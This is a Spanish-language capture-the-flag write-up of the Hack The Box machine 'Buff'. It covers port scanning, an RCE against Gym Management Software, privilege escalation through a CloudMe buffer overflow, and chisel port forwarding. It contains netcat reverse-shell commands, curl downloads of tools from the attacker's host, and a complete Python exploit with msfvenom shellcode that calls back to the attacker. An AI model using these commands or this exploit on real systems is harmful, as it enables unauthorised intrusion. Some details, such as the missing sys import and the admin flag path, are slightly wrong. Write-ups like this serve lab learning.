Buff

En el presente desafío, abordaremos la máquina “Buff” de Hack The Box. En este escenario, aprenderemos a como explotar de forma fácil un RCE para ganar acceso al sistema y posteriormente para ganar a

Anterior🟢 Easy Siguiente🟠 Medium

Última actualización hace 1 año

¿Te fue útil?

Buff

Resumen

En el presente desafío, abordaremos la máquina “Buff” de Hack The Box. En este escenario, aprenderemos a como explotar de forma fácil un RCE para ganar acceso al sistema y posteriormente para ganar acceso a administrador por medio de un BUFFER OVER FLOW

Escaneo de puertos

Primero que todo hacemos un escaneo de puerto con nmap a los puertos abiertos con los siguientes parametros:

-p- : Escanear todos los 65353 puertos que existen
-Pn : Sirve para decirle a Nmap que el host destino si esta arriba
–min-rate 5000 : Lo que hace este parámetro de nmap es controlar el numero mínimo de paquetes por segundo que se enviara durante el escaneo

nmap -p- --min-rate 5000 -Pn 10.10.10.198
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-04 14:35 EST
Nmap scan report for 10.10.10.198
Host is up (0.53s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE
7680/tcp open  pando-pub
8080/tcp open  http-proxy

ahora que ya tenemos el numero de puertos abiertos lo que hacemos es ejecutar los scripts de nmap para validar el servicio que está corriendo en cada puerto, el comando nmap consta de los siguientes parametros:

-p : Con este parámetro especificamos que puerto vamos a escanear
-sCV: Con este parámetro hacemos que nmap ejecute algunos scripts para saber qué tipo de servicio está corriendo en el puerto
-A : Nos sirve para obtener una detección de servicios y sistemas operativos

nmap -p7680,8080 -Pn -sCV --script="vuln and safe" 10.10.10.198
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-04 14:37 EST
Stats: 0:01:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.38% done; ETC: 14:39 (0:00:02 remaining)
Stats: 0:02:15 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.38% done; ETC: 14:39 (0:00:03 remaining)
Nmap scan report for 10.10.10.198
Host is up (0.14s latency).
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       PACKETSTORM:176334      7.5     https://vulners.com/packetstorm/PACKETSTORM:176334      *EXPLOIT*
|       PACKETSTORM:171631      7.5     https://vulners.com/packetstorm/PACKETSTORM:171631      *EXPLOIT*
|       OSV:BIT-APACHE-2023-25690       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2023-25690
|       OSV:BIT-APACHE-2022-31813       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-31813
|       OSV:BIT-APACHE-2022-23943       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-23943
|       OSV:BIT-APACHE-2022-22720       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-22720
|       OSV:BIT-APACHE-2021-44790       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-44790
|       OSV:BIT-APACHE-2021-42013       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-42013
|       OSV:BIT-APACHE-2021-41773       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-41773
|       OSV:BIT-APACHE-2021-39275       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-39275
        ...
|       1145F3D1-0ECB-55AA-B25D-A26892116505    4.3     https://vulners.com/githubexploit/1145F3D1-0ECB-55AA-B25D-A26892116505  *EXPLOIT*
|       108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2    4.3     https://vulners.com/githubexploit/108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2  *EXPLOIT*
|       0BC014D0-F944-5E78-B5FA-146A8E5D0F8A    4.3     https://vulners.com/githubexploit/0BC014D0-F944-5E78-B5FA-146A8E5D0F8A  *EXPLOIT*
|       06076ECD-3FB7-53EC-8572-ABBB20029812    4.3     https://vulners.com/githubexploit/06076ECD-3FB7-53EC-8572-ABBB20029812  *EXPLOIT*
|       05403438-4985-5E78-A702-784E03F724D4    4.3     https://vulners.com/githubexploit/05403438-4985-5E78-A702-784E03F724D4  *EXPLOIT*
|       00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08    4.3     https://vulners.com/githubexploit/00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08  *EXPLOIT*
|       CVE-2023-45802  2.6     https://vulners.com/cve/CVE-2023-45802
|_      OSV:BIT-APACHE-2020-13938       2.1     https://vulners.com/osv/OSV:BIT-APACHE-2020-13938

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 379.19 seconds

Explotación

ahora hacemos lo típico ,empezamos a preguntar a san google ,si hay alguna vulnerabilidad para el sistema de Gym Management Software 1.0 y este nos da la siguiente respuesta.

por ende entramos al primer link que hace referencia a la famosa pagina de exploitdb y como podemos notar ,este sistema es vulnerable a un RCE ( Remote Comand Execution ) , por medio de la subida de un archivo php

asi que nos traemos ese codigo, y la ejecutamos con el siguiente comando

python2 shell.py http://10.10.10.198:8080/

y al ejecutarlo nos dará acceso al servidor.

pero como podemos ver ,no es tan cómoda la shell,por ende lo que haremos es descargar la versión ejecutable de netcat en el siguiente link

wget https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip;unzip netcat-win32-1.12.zip -d .

ya con esto lo que hacemos es abrir un servidor http para que la maquina victima pueda descargar el nc.exe

python -m http.server 80

en pocas palabras con este comando lo que hacemos es abrir un servidor ,donde si ingresamos veremos que nos listara todos los archivos que estarán en la carpeta

por ende ahora en el servidor de la victima lo que harmos es descargar el netcat que tenemos en nuestro servidor ,de la siguiente forma

curl 10.10.14.48/nc64.exe -o nc.exe

ya con el net cat descargado lo que hacemos es colocarnos en escucha con el siguiente comando

rlwrap nc -lvnp 4444

y mandamos una shell inversa a nuestra ip

nc.exe 10.10.14.48 4444 -e powershell

como podemos observar vemos que recibimos una shell en el comando de escucha donde nos podemos mover mas facilmente en los archivos del sistema

ahora para la primera flag la encontramos en el siguiente directorio

type  C:\users\shaun\Desktop\user.txt

Escala de privilegios

para elevar privilegios utilizaremos WinPeas este software nos ayuda a automatizar el apartado de escalado de privilegios en windows

por ende lo descargamos con el siguiente comando

wget https://github.com/carlospolop/PEASS-ng/releases/download/20240303-ce06043c/winPEASx64.exe

y lo que haremos es abrir un servidor en el puerto 80 para poder descargar el archivo en la maquina victima ,hay que tener en cuenta que debemos cerrar el servidor anterior para abrir uno en el mismo puerto

curl 10.10.14.48/winPEASx64.exe -o winPEASx64.exe

por ende ejecutamos el archivo con el siguiente comando

./winPEASx64.exe

esperamos un rato que este se ejecute y al revisar el log de este notamos que en la carpeta de descarga existe un archivo ejecutable

este archivo ejecutable hace referencia a el software que permite almacenar información en la nube ,pero al investigar y buscar notamos que esta aplicacion en su versión de 1.11.2es vulnerable a BUFFER OVERFLOW .

Al revisar la prueba de concepto podemos ver que el lo que hace es enviar un payload previamente generado a el puerto 8888 de la maquina ,por ende cuando se ejecuta el .exe este abrira el puerto 8888 dentro de la maquina .

Por ende lo que haremos es ejecutar el .exe de cloud me

./CloudMe_1112.exe

y revisamos con el siguiente comando si este abrió el puerto 8888 dentro del servidor

netstat -an | findstr "LISTENING"

Por ende ya tenemos el puerto abierto ,pero necesitamos que mi servidor ,tenga el acceso al puerto 8888 del servidor victima ,para esto necesitamos hacer un PORT FORWARDING ósea hacer que el puerto 8888 del cliente se conecte con algún puerto mío.

Para eso utilizamos la herramienta llamada chisel

nos descargamos la versión de windows y la del linux y lo que hacemos es que el servidor atacante se ponga en escucha mientras que en el victima tome el puerto 8888 y lo conecte a mi servidor

./chisel server --reverse -p 1234

ahora ejecutamos el chisel en la maquina victima

./chisel.exe client 10.10.14.48:1234 R:8888:127.0.0.1:8888

ahora que ya tenemos acceso desde nuestro servidor atacante al puerto que necesitamos de la victima ,leemos el exploit y por lo que vemos necesitamos generar un payload con metasploit que nos permita hacer una shell inversa.

Para lograr esto ejecutamos lo sigueinte

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.48 LPORT=4449 EXITFUNC=thread -b "\x00\x0d\x0a" -f python

donde el lhost y el lport deben colocar el puerto de escucha del netcat y la ip tuya ,por ende al ejecutar esto nos dará lo siguiente

por ende tomamos el exploit y pegamos la cadena de texto que este nos generó

import socket

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

#msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.48 LPORT=4449 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
buf =  b""
buf += b"\xdb\xdf\xba\xcb\xaa\xfe\xfc\xd9\x74\x24\xf4\x5b"
buf += b"\x2b\xc9\xb1\x52\x31\x53\x17\x03\x53\x17\x83\x20"
buf += b"\x56\x1c\x09\x4a\x4f\x63\xf2\xb2\x90\x04\x7a\x57"
buf += b"\xa1\x04\x18\x1c\x92\xb4\x6a\x70\x1f\x3e\x3e\x60"
buf += b"\x94\x32\x97\x87\x1d\xf8\xc1\xa6\x9e\x51\x31\xa9"
buf += b"\x1c\xa8\x66\x09\x1c\x63\x7b\x48\x59\x9e\x76\x18"
buf += b"\x32\xd4\x25\x8c\x37\xa0\xf5\x27\x0b\x24\x7e\xd4"
buf += b"\xdc\x47\xaf\x4b\x56\x1e\x6f\x6a\xbb\x2a\x26\x74"
buf += b"\xd8\x17\xf0\x0f\x2a\xe3\x03\xd9\x62\x0c\xaf\x24"
buf += b"\x4b\xff\xb1\x61\x6c\xe0\xc7\x9b\x8e\x9d\xdf\x58"
buf += b"\xec\x79\x55\x7a\x56\x09\xcd\xa6\x66\xde\x88\x2d"
buf += b"\x64\xab\xdf\x69\x69\x2a\x33\x02\x95\xa7\xb2\xc4"
buf += b"\x1f\xf3\x90\xc0\x44\xa7\xb9\x51\x21\x06\xc5\x81"
buf += b"\x8a\xf7\x63\xca\x27\xe3\x19\x91\x2f\xc0\x13\x29"
buf += b"\xb0\x4e\x23\x5a\x82\xd1\x9f\xf4\xae\x9a\x39\x03"
buf += b"\xd0\xb0\xfe\x9b\x2f\x3b\xff\xb2\xeb\x6f\xaf\xac"
buf += b"\xda\x0f\x24\x2c\xe2\xc5\xeb\x7c\x4c\xb6\x4b\x2c"
buf += b"\x2c\x66\x24\x26\xa3\x59\x54\x49\x69\xf2\xff\xb0"
buf += b"\xfa\xf7\xf5\xb4\xca\x6f\x08\xc8\x3b\x11\x85\x2e"
buf += b"\x51\xc1\xc3\xf9\xce\x78\x4e\x71\x6e\x84\x44\xfc"
buf += b"\xb0\x0e\x6b\x01\x7e\xe7\x06\x11\x17\x07\x5d\x4b"
buf += b"\xbe\x18\x4b\xe3\x5c\x8a\x10\xf3\x2b\xb7\x8e\xa4"
buf += b"\x7c\x09\xc7\x20\x91\x30\x71\x56\x68\xa4\xba\xd2"
buf += b"\xb7\x15\x44\xdb\x3a\x21\x62\xcb\x82\xaa\x2e\xbf"
buf += b"\x5a\xfd\xf8\x69\x1d\x57\x4b\xc3\xf7\x04\x05\x83"
buf += b"\x8e\x66\x96\xd5\x8e\xa2\x60\x39\x3e\x1b\x35\x46"
buf += b"\x8f\xcb\xb1\x3f\xed\x6b\x3d\xea\xb5\x8c\xdc\x3e"
buf += b"\xc0\x24\x79\xab\x69\x29\x7a\x06\xad\x54\xf9\xa2"
buf += b"\x4e\xa3\xe1\xc7\x4b\xef\xa5\x34\x26\x60\x40\x3a"
buf += b"\x95\x81\x41"

overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + buf))

buf = padding1 + EIP + NOPS + buf + overrun 

try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,8888))
        s.send(buf)
except Exception as e:
        print(sys.exc_value)

ya con esto nos faltaría colocarnos en escucha en el puerto que especificamos y ejecutamos el Script ,al ejecutar este nos dará acceso a la shell del administrador

Ahora lo que hacemos es buscar la flag del admin que se encuentra en esta ruta

type  C:\users\Adminitrator\Desktop\user.txt

Referencias

Anterior🟢 Easy Siguiente🟠 Medium

Última actualización hace 1 año

¿Te fue útil?